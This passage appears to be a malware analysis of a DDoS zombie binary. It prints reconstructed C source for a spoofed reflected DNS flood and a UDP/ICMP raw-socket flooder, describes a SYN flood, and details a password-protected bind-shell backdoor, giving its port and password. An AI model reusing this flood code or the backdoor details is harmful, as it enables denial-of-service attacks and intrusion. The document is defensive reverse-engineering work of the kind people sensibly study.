              edi=1;
            } else {
              /* 0x8049288 */
              bcopy(edx->h_addr_list[0],&local_ipofhostname,4);
              msg[12]=local_ipofhostname; /* duh */
              iterations_to_dns_lookup=40000; /* counter?
*/
            }
            /* 0x80492b2 */
          }
        } while (edi);
        /* 80492b6 */
        long ofs=0;
        for (edi=0; edi<9; ++edi) {
          /* 80492c4 */
          if (some_flag==1) {
            some_flag=0;
            edx=random()%8000;
          } else {
            /* 0x80492e8 */
            edx=0;
          }
          /* 0x80492ea */
          if (public_dns_servers[edx]) {
            pointer_to_destination_ip=&public_dns_servers[edx];
            do {
              /* 8049308 */
              si.sin_addr.s_addr=*pointer_to_destination_ip;
              /* 8049316 */
              memcpy(udp_payload,&lc_dnstab[ofs],lc_dnslen[edi]);
              /* 8049338 */
              udp_payload[0]=random()%255;
              udp_payload[1]=random()%255;
              /* 8049363 */
              if (arg1==0 && arg2==0) {
                /* 804936f */
                eax=random()%30000;
              } else {
                /* 0x8049380 */
                eax=(arg1<<8)+arg2;
              }
              /* 0x804938a */
              eax=ntohs(eax);
              udp_header[0]=eax;     /* short[]! */
              udp_header[1]=0x3500;  /* udp destination port: ntohs(53) */
              /* 80493a1 */
              udp_header[2]=ntohs(lc_dnslen[edi]+8); /* udp payload length plus header size */
              udp_header[3]=0;
              /* 80493b6 */
              if (usehostname==0) {
                msg[12]=srcip[0];
                msg[13]=srcip[1];
                msg[14]=srcip[2];
                msg[15]=srcip[3]; /* copy copy of src ip to IP header */
              }
              /* 0x80493ec */
              *(uint32_t*)&msg[16] = *pointer_to_destination_ip;
              msg[0]=0x45; /* ip version 4, header len 5 words */
              /* 80493fa */
              msg[8]=(random()%130)+120;           /* semi-random IP TTL */
              *(uint16_t*)&msg[4] = random()%255;  /* IP ID 0-254 */
              msg[9]=17;                           /* IP protocol = IPPROTO_UDP */
              *(uint16_t*)&msg[6]=0;               /* frag_off zero */
              *(uint16_t*)&msg[2]=ntohs(lc_dnslen[edi]+0x1c);
                /* IP tot_len = length of payload + udp header + ip header */
              *(uint16_t*)&msg[10]=0;              /* checksum zero */
              /* 804943d */
              /* I skip the checksum code here, as it is a verbatim copy of
                 several other locations in this code and quite standard */
              /* 80494ad */
              sendto(raw_sock,msg,lc_dnslen[edi]+0x1c,0,&si,sizeof(si));
              /* 80494d6 */
              if (flag==0) {
                usleep(300);
              } else {
                /* 0x80494e8 */
                if (local_intptr1!=flag) goto huh;
                usleep(300);
                local_intptr1=0;
              }
              /* 0x8049507 */
              --iterations_to_dns_lookup;
              goto huh2;
            huh:
              /* 0x8049514 */
              ++local_intptr1;
              /* yuck! How did the guy get gcc to generate this code!
*/
            huh2:
              /* 0x804951a */
            } while (*pointer_to_destination_ip++);
          }
          /* 0x8049530 */
          ofs+=32;
        }
        /* 8049541 */
      }
    }
    /* 0x8049548 */
    child_pid=0; /* this is the error handling if socket failed */
    return 0;
  }

I find this code surprisingly bad. The author does lots of unnecessary
stuff like copying the read-only DNS tables to local variables... and then
still not writing to them! There is absolutely no gain here. Or the way
he passes the IP number as four promoted integers, copying them to local
variables (I already optimized this step away in the above code), and
later copying those local variables into the IP header.

The whole protocol looks pretty strange. All the arguments save flag come
verbatim from the decrypted command packet. If usehostname is set,
gethostbyname is called on hostname. The idea is that this code will
resolve the name anew every 40000 iterations. This is probably meant to
thwart defenses like whitehouse.gov did (change IP, blackhole old IP on
router, announce new IP in DNS). So the idea is pretty good, but the code
looks like the guy does not have much C experience and just copied some
code from other places together. Just look at the gethostbyname code! It
uses bcopy to copy 4 bytes into a local variable which it then copies into
the header. Why not copy directly into the header? He probably didn't
get the cast right.

What does this function do? You pass it an IP (4 args) and a port (2
args), a flag (0) of which I don't understand the meaning yet, usehostname
and hostname. The routine will then create a raw socket and send spoofed
packets claiming to come from the victim. The passed IP is used unless
usehostname is nonzero. Then hostname is resolved and the first IP from
the response is used. After that, the code puts together an IP header, a
UDP header and a UDP payload, which he takes from a static list of 9
requests asking for the IN SOA of .com, .net, .de, .edu, .org, .usc.edu,
.es, .gr and .ie.
If the specified UDP source port is zero, a random port below 30000 is
used. The code starts at a random server below index 8000 for .com, at
index 0 for the other records. Then it sends the same query to each of
the remaining servers in the list, pausing for 300 usec between queries.
This makes sure the process does not eat enough CPU time to appear
prominently in top, and it avoids clogging the LAN with billions of
collisions. This sending is done in an endless loop. The idea here is
that this function is called in the child process forked off the main
zombie process which notes the PID in child_pid so it can kill it later
on demand.

This type of flood looks very dangerous. In effect you can't defend
against it. The traffic is not coming from the dial-up networks of the
infected Mom and Pop machines, it is coming from public DNS servers with
big bandwidth. You can't blackhole them or you would kill your own DNS.
And, on each of the abused servers, the traffic pattern is only roughly
one query every 3.5 seconds, so it does not stick out on a very busy big
DNS server. The only way to defend against this is to install egress
filters at all major ISPs.

  do_flood/0xfffff9a4: pointer to udp header
  do_flood/0xfffff9e4: udp payload area
  do_flood/0xfffff9c4: result IP of gethostbyname is bcopy'd here
  do_flood/0xfffff9a0: pointer to udp payload area
  do_flood/0xfffff99c: local_intptr1
  do_flood/0xfffff998: iterations_to_dns_lookup
  do_flood/0xfffff990: ofs
  do_flood/0xfffff98c: tmp_ptr (checksum)
  do_flood/0xfffff9c2: tmp_int (checksum)

Case 5: [being worked on by Olaf] appears to be a hybrid icmp/udp flooder.
The udp packets have an invalid checksum and the icmp packets are ECHO
request (i.e. ping). The source and destination IPs are set from the
command packet. A flag says whether it sends icmp or udp.
Here is Olaf's rendition of the case handler itself:

  if (child_pid) break;
  activity_mode=5;
  if (child_pid=fork()) break;
  memcpy(buf7,plaintext,255);
  memcpy(buf7,buf7+13,254);
  do_udp_icmp_flood(
    plaintext[2], plaintext[3], plaintext[4], plaintext[5],
    plaintext[6], plaintext[7], plaintext[8], plaintext[9],
    plaintext[10], plaintext[11], plaintext[13], buf7
  );
  exit(0);

And this is Olaf's reverse engineering of the function itself:

  80499f4: do_udp_icmp_flood(??)
  do_udp_icmp_flood/0xffffffd0: iphdr.c_ihl
  do_udp_icmp_flood/0xffffffd2: iphdr.tot_len
  do_udp_icmp_flood/0xffffffd4: iphdr.id
  do_udp_icmp_flood/0xffffff60: ptr -> sin
  do_udp_icmp_flood/0xffffff64: var (const 0x1d 29)
  do_udp_icmp_flood/0xffffff68: sock
  8049b6c: ipv4checksum udp len=9
  8049b9d: ipv4checksum end
  8049bd2: ipv4checksum icmp len=9
  8049c05: ipv4checksum end
  8049c2c: ipv4checksum hdr len=20
  8049c5d: ipv4checksum end
  do_udp_icmp_flood/0x8: use_udp
  do_udp_icmp_flood/0xc: destination_port_udp
  do_udp_icmp_flood/0x10: ip_addr0_0
  do_udp_icmp_flood/0x14: ip_addr0_1
  do_udp_icmp_flood/0x18: ip_addr0_2
  do_udp_icmp_flood/0x1c: ip_addr0_3
  do_udp_icmp_flood/0x20: ip_addr1_0
  do_udp_icmp_flood/0x24: ip_addr1_1
  do_udp_icmp_flood/0x28: ip_addr1_2
  do_udp_icmp_flood/0x2c: ip_addr1_3
  do_udp_icmp_flood/0x30: flag_have_host_name
  do_udp_icmp_flood/0x34: host_name

  void do_udp_icmp_flood(
      unsigned char use_udp,
      unsigned char udp_dport,
      unsigned char ip_addr0_0,
      unsigned char ip_addr0_1,
      unsigned char ip_addr0_2,
      unsigned char ip_addr0_3,
      unsigned char ip_addr1_0,
      unsigned char ip_addr1_1,
      unsigned char ip_addr1_2,
      unsigned char ip_addr1_3,
      unsigned char flag_host_name,
      char*host_name)
  {
    struct {
      iphdr hdr;               /* 0xffffffd0(%ebp) 20 */
      union {                  /* 0xffffffe4(%ebp) */
        udphdr udp;
        icmphdr icmp;
      } p;
      unsigned char d[4];      /* 0xffffffec(%ebp) */
    } s;
    struct sockaddr_in sin;    /* 0xfffffff0(%ebp) */
    unsigned char buf2[32];    /* 0xffffffb0(%ebp) */
    unsigned char buf1[32];    /* 0xffffff90(%ebp) */

    sin.sin_family=AF_INET;
    sin.sin_port=htons(random()%255);
    sprintf(buf1,"%d.%d.%d.%d",b1,b2,b3,b4);
    if (flag_host_name==0) {
      sprintf(buf2,"%d.%d.%d.%d",a1,a2,a3,a4);
      sin.sin_addr.s_addr = inet_addr(buf2);
    }
    if ((sock = socket(2,3,255))>-1) {
      s.hdr.c_ihl = 0x45;
      s.hdr.tot_len = 0x1c28;
      s.hdr.id = 0x5504;
      s.hdr.frag_off= 0xfe1f;
      s.hdr.ttl = 120 + (random()%130);
      s.hdr.saddr = inet_addr(buf1);
      s.hdr.daddr = inet_addr(buf2);
      s.hdr.check = 0;
      if (use_udp) {
        s.hdr.protocol = 17; /* UDP */
        s.p.udp.sport = htons(random()%255);
        s.p.udp.dport = htons(udp_dport);
        s.p.udp.len = 0x0900; /* len=9 */
        s.hdr.check = s.p.udp.check = ipv4_checksum(&s.p,9);
        s.d[0] = 'a';
      } else {
        s.hdr.protocol = 1; /* icmp */
        s.p.icmp.type = 8;  /* Echo Request */
        s.p.icmp.code = 0;
        s.hdr.check = s.p.icmp.check = ipv4_checksum(&s.p,9);
      }
      s.hdr.check = 0;
      s.hdr.check = ipv4_checksum(&s.hdr,20);
      while(1) {
        int bla=0; counter=0;
        if (flag_host_name) {
          if (counter>0) {
            struct hostent*hent;
            if (hent=gethostbyname(host_name)) {
              unsigned int tmp;
              bcopy(hent->h_addr,&tmp,4);
              s.hdr.daddr=tmp;
              sin.sin_addr.s_addr=tmp;
              counter=40000;
            } else {
              sleep(600);
              bla=1;
            }
          }
        }
        if (!bla) {
          sendto(sock,&s,29,0,&sin,sizeof(struct sockaddr_in));
          sendto(sock,&s,29,0,&sin,sizeof(struct sockaddr_in));
        }
        --counter;
      }
    } else {
      child_pid=0;
      return 0;
    }
  }

  unsigned short ipv4_checksum(void*addr,unsigned int count) {
    register long sum = 0;
    unsigned short* p = addr;
    while (count>1) {
      /* This is the inner loop */
      sum+= *p++;
      count-= 2;
    }
    /* Add left-over byte, if any */
    if (count>0) sum+= *(unsigned char*)p;
    /* Fold 32-bit sum to 16 bits */
    while (sum>>16) sum = (sum&0xffff) + (sum>>16);
    return ~sum;
  }

Case 6: This code has the same basic fork-setsid-child_pid sequence as 4
and 5, but then it does not call a function but does everything inline.
It sets several signals to SIG_IGN: CHLD (thrice!), HUP, TERM, INT. A
SO_REUSEADDR TCP socket is bound to port 23281 and listen(3) is called.
Finally, accept() is called in a loop and for each connected client a new
child is forked. The child then calls recv to read 19 bytes, scans the
input for a \n or \r and overwrites them with 0. The bytes before the
first \r or \n are incremented. The result is then compared with "TfOjG"
(including trailing 0!). So, to match this, one has to send "SeNiF"
("FiNeS" backwards?). If the input did not match, "\xff\xfb\x01\x00" is
written, the connection is closed and the child exits. This rings a bell
but I don't know which one. Is this a TELNET sequence to confuse banner
scanners? Don't know. Anyway, if the password matched, it gets more
interesting: the descriptor is copied over stdin, stdout and stderr,
setenv is used to put "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:."
and "TERM=linux" in the environment and make sure HISTFILE is not in it
(ROTFL), and then calls execl("sh","/bin/sh",0).

Mhh, so it's the multi-tool in the backdoor market! _Two_ industry
strength back doors for the price of one! ;)

  804a2a8: setenv(const char *, const char *, int overwrite)

Case 7: This code looks almost exactly like case 3, except that the output
of the shell is thrown away and not sent back.

Case 8: This is the clean-up command. It just sends SIGKILL to child_pid,
i.e. it can be used to deactivate the currently running DDoS subprocess.

Case 9: This is exactly like case 4, except that you can specify "flag".
Case 4 always called do_flood() with flag==0. I tried to understand the
meaning of flag, but I failed. It appears to influence the number of
iterations before gethostbyname is called again, but since you can only
specify one byte, this does not make a lot of a difference.

Case 10: Like case 9, but calls another function (8049d40), which I'll
call do_syn_flood. Also, argument 13 of that function is always passed as
zero.

  8049d40: do_syn_flood()
  80678b0: "%u.%u.%u.%u"

This function takes a whopping 14 arguments.
If arg13 is zero, the first four are the destination IP, otherwise gethostbyname is run on the 14th argument (buf) and the result is used as destination IP. If arg7 is zero, the source IP is random, otherwise it is arguments 8 to 11. arg5 and arg6 are the upper and lower bytes of the TCP destination port. arg12 is analogous to flag in do_flood, i.e. I don't know ;)

do_syn_flood/0x8: char arg1
do_syn_flood/0xc: char arg2
do_syn_flood/0x10: char arg3
do_syn_flood/0x14: char arg4
do_syn_flood/0x18: char arg5
do_syn_flood/0x1c: char arg6
do_syn_flood/0x20: char arg7
do_syn_flood/0x24: char arg8
do_syn_flood/0x28: char arg9
do_syn_flood/0x2c: char arg10
do_syn_flood/0x30: char arg11
do_syn_flood/0x34: char arg12
do_syn_flood/0x38: char arg13
do_syn_flood/0x3c: char* buf
do_syn_flood/0xffffff5c: copy of arg1
do_syn_flood/0xffffff58: copy of arg2
do_syn_flood/0xffffff54: copy of arg3
do_syn_flood/0xffffff38: copy of arg4
do_syn_flood/0xffffff50: copy of arg8
do_syn_flood/0xffffff4c: copy of arg9
do_syn_flood/0xffffff48: copy of arg10
do_syn_flood/0xffffff44: copy of arg11
do_syn_flood/0xfffffff0: sockaddr_in si
do_syn_flood/0xffffff88: sprintf_scratch_buf[32]
do_syn_flood/0xffffffc8: packet.ip_hdr
do_syn_flood/0xffffff40: raw_sock
do_syn_flood/0xffffff68: sprintf_scratch_buf2[32]
do_syn_flood/0xffffffa8: somestruct.int0 (init source_ip)
do_syn_flood/0xffffffac: somestruct.int4 (init dest_ip)
do_syn_flood/0xffffffb0: somestruct.char8 (init 0)
do_syn_flood/0xffffffb1: somestruct.char9 (init 6)
do_syn_flood/0xffffffb2: somestruct.short10 (init htons(20)==0x1400)
do_syn_flood/0xffffffb4: copy-of-tcp-header
do_syn_flood/0xffffffc8: packet.ip.version,ihl
do_syn_flood/0xffffffc9: packet.ip.tos
do_syn_flood/0xffffffca: packet.ip.tot_len
do_syn_flood/0xffffffcc: packet.ip.id
do_syn_flood/0xffffffce: packet.ip.frag_off
do_syn_flood/0xffffffd0: packet.ip.ttl
do_syn_flood/0xffffffd1: packet.ip.protocol
do_syn_flood/0xffffffd2: packet.ip.checksum
do_syn_flood/0xffffffd4: packet.ip.source_ip
do_syn_flood/0xffffffd8: packet.ip.dest_ip
do_syn_flood/0xffffffdc: packet.tcp.sourceport
do_syn_flood/0xffffffde: packet.tcp.destport
do_syn_flood/0xffffffe0: packet.tcp.sequence_number
do_syn_flood/0xffffffe4: packet.tcp.ack
do_syn_flood/0xffffffe8: packet.tcp.flags res1,doff
do_syn_flood/0xffffffe9: packet.tcp.flags cwr,ece,urg,ack,psh,rst,syn,fin
do_syn_flood/0xffffffea: packet.tcp.window
do_syn_flood/0xffffffec: packet.tcp.checksum
do_syn_flood/0xffffffee: packet.tcp.urg_ptr
do_syn_flood/0xfffffff0: sockaddr_in si.sin_family
do_syn_flood/0xfffffff2: sockaddr_in si.sin_port
do_syn_flood/0xfffffff4: sockaddr_in si.sin_addr
do_syn_flood/0xffffff62: checksum accumulator temp

Case 11:
Same as case 10, except that you can set arg13/flag.

Case 12:
Looks familiar (like 4, 9, 10 and 11), but it calls a new function (8049564).

8049564: do_other_dns_flood()

do_other_dns_flood takes 13 arguments: 1-12 are again char, 13 is a char* to the rest of the decrypted buffer. The first four arguments are the destination IP, if usehostname is zero. If arg5-arg8 are all zero, the source IP is random (no 255s), otherwise it's arg5-arg8. This time, arg9 plays the role of the mysterious "flag". arg10 and arg11 are again taken as UDP source port, and the destination port is set to htons(53), i.e. DNS.

In this function, there is some very bizarre code: "mov %ebp,0xfffff978(%ebp)" and then later "mov 0xfffff978(%ebp),%edx" and "add $0xfffffde8,%edx". I have never seen gcc generate code like this to access a local variable on the stack. Maybe the code is using nested functions or variable-length arrays or so. This confuses my annotation perl script, though :-(

The code again randomizes the DNS sequence number.

What's the difference between do_flood and this function? This function does not use the list of public DNS servers; the destination IP is one of the parameters. There are also subtle differences in implementation.
The random source IP number is generated by writing the results of random() to the IP itself instead of going through sprintf and inet_addr, so maybe this is the author's testbed in the search for a cleaner implementation of do_flood()?

do_other_dns_flood/0x8: char arg1 (destip[0])
do_other_dns_flood/0xc: char arg2 (destip[1])
do_other_dns_flood/0x10: char arg3 (destip[2])
do_other_dns_flood/0x14: char arg4 (destip[3])
do_other_dns_flood/0x18: char arg5 (srcip[0])
do_other_dns_flood/0x1c: char arg6 (srcip[1])
do_other_dns_flood/0x20: char arg7 (srcip[2])
do_other_dns_flood/0x24: char arg8 (srcip[3])
do_other_dns_flood/0x28: char mysterious_flag
do_other_dns_flood/0x2c: char arg10 (srcport[0])
do_other_dns_flood/0x30: char arg11 (srcport[1])
do_other_dns_flood/0x34: char usehostname
do_other_dns_flood/0x38: char* hostname
do_other_dns_flood/0xfffff9ac: copy of arg1
do_other_dns_flood/0xfffff9a8: copy of arg2
do_other_dns_flood/0xfffff9a4: copy of arg3
do_other_dns_flood/0xfffff9a0: copy of arg4
do_other_dns_flood/0xfffff99c: copy of arg5
do_other_dns_flood/0xfffff998: copy of arg6
do_other_dns_flood/0xfffff994: copy of arg7
do_other_dns_flood/0xfffff990: copy of arg8
do_other_dns_flood/0xffffffdc: copy of dnslen[]
do_other_dns_flood/0xfffffde8: copy of dnstab[]
do_other_dns_flood/0xfffffdd8: sockaddr_in in.sin_family
do_other_dns_flood/0xfffffdda: sockaddr_in in.sin_port
do_other_dns_flood/0xfffffddc: sockaddr_in in.sin_addr
do_other_dns_flood/0xfffff98c: int raw_sock
do_other_dns_flood/0xfffff9d8: packet.ip.version,ihl
do_other_dns_flood/0xfffff9d9: packet.ip.tos
do_other_dns_flood/0xfffff9da: packet.ip.tot_len
do_other_dns_flood/0xfffff9dc: packet.ip.id
do_other_dns_flood/0xfffff9de: packet.ip.frag_off
do_other_dns_flood/0xfffff9e0: packet.ip.ttl
do_other_dns_flood/0xfffff9e1: packet.ip.protocol
do_other_dns_flood/0xfffff9e2: packet.ip.checksum
do_other_dns_flood/0xfffff9e4: packet.ip.source_ip
do_other_dns_flood/0xfffff9e8: packet.ip.dest_ip
do_other_dns_flood/0xfffff9ec: packet.udp.sourceport
do_other_dns_flood/0xfffff9ee: packet.udp.destport
do_other_dns_flood/0xfffff9f0: packet.udp.len
do_other_dns_flood/0xfffff9f2: packet.udp.checksum
do_other_dns_flood/0xfffff9f4: packet.payload
do_other_dns_flood/0xfffff9d8: sprintf buf for arg1-arg4
do_other_dns_flood/0xfffff988: pointer to packet.udp.sourceport
do_other_dns_flood/0xfffff984: pointer to packet.payload
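
The packet.* annotations above can be cross-checked by writing the packet down as a C struct and comparing the field offsets with the %ebp displacements. The following is only a sketch of that check, not the code from the binary: the struct and function names are made up for illustration, the payload size is a placeholder (the annotations only give its start), and it assumes the compiler inserts no padding, which holds here because every field sits on its natural alignment.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* %ebp displacement of the first packet byte, taken from the annotation
 * "0xfffff9d8: packet.ip.version,ihl". */
#define PACKET_BASE_DISP 0xfffff9d8u

/* Hypothetical reconstruction of the on-stack packet in do_other_dns_flood. */
struct dns_flood_packet {
    uint8_t  version_ihl;     /* 0xfffff9d8 */
    uint8_t  tos;             /* 0xfffff9d9 */
    uint16_t tot_len;         /* 0xfffff9da */
    uint16_t id;              /* 0xfffff9dc */
    uint16_t frag_off;        /* 0xfffff9de */
    uint8_t  ttl;             /* 0xfffff9e0 */
    uint8_t  protocol;        /* 0xfffff9e1 */
    uint16_t checksum;        /* 0xfffff9e2 */
    uint32_t source_ip;       /* 0xfffff9e4 */
    uint32_t dest_ip;         /* 0xfffff9e8 */
    uint16_t udp_sourceport;  /* 0xfffff9ec */
    uint16_t udp_destport;    /* 0xfffff9ee */
    uint16_t udp_len;         /* 0xfffff9f0 */
    uint16_t udp_checksum;    /* 0xfffff9f2 */
    uint8_t  payload[4];      /* 0xfffff9f4, real size unknown (placeholder) */
};

/* Turn a 32-bit %ebp displacement into a byte offset from the packet start.
 * Unsigned arithmetic wraps modulo 2^32, so no sign handling is needed. */
size_t frame_disp_to_offset(uint32_t disp)
{
    return (size_t)(disp - PACKET_BASE_DISP);
}

/* Returns 1 if every annotated displacement agrees with the struct layout. */
int layout_matches_annotations(void)
{
    return offsetof(struct dns_flood_packet, tos)            == frame_disp_to_offset(0xfffff9d9u)
        && offsetof(struct dns_flood_packet, tot_len)        == frame_disp_to_offset(0xfffff9dau)
        && offsetof(struct dns_flood_packet, id)             == frame_disp_to_offset(0xfffff9dcu)
        && offsetof(struct dns_flood_packet, frag_off)       == frame_disp_to_offset(0xfffff9deu)
        && offsetof(struct dns_flood_packet, ttl)            == frame_disp_to_offset(0xfffff9e0u)
        && offsetof(struct dns_flood_packet, protocol)       == frame_disp_to_offset(0xfffff9e1u)
        && offsetof(struct dns_flood_packet, checksum)       == frame_disp_to_offset(0xfffff9e2u)
        && offsetof(struct dns_flood_packet, source_ip)      == frame_disp_to_offset(0xfffff9e4u)
        && offsetof(struct dns_flood_packet, dest_ip)        == frame_disp_to_offset(0xfffff9e8u)
        && offsetof(struct dns_flood_packet, udp_sourceport) == frame_disp_to_offset(0xfffff9ecu)
        && offsetof(struct dns_flood_packet, udp_destport)   == frame_disp_to_offset(0xfffff9eeu)
        && offsetof(struct dns_flood_packet, udp_len)        == frame_disp_to_offset(0xfffff9f0u)
        && offsetof(struct dns_flood_packet, udp_checksum)   == frame_disp_to_offset(0xfffff9f2u)
        && offsetof(struct dns_flood_packet, payload)        == frame_disp_to_offset(0xfffff9f4u);
}

/* Print where the UDP header and the payload start inside the packet. */
void print_layout(void)
{
    assert(layout_matches_annotations());
    printf("udp header at +%zu, payload at +%zu\n",
           offsetof(struct dns_flood_packet, udp_sourceport),
           offsetof(struct dns_flood_packet, payload));
}
```

Calling print_layout() from a small main() confirms that the annotated offsets describe a plain 20-byte IP header followed by an 8-byte UDP header, with the payload starting at byte 28. This fits the two saved pointers at 0xfffff988 and 0xfffff984, which point at the UDP header and the payload respectively.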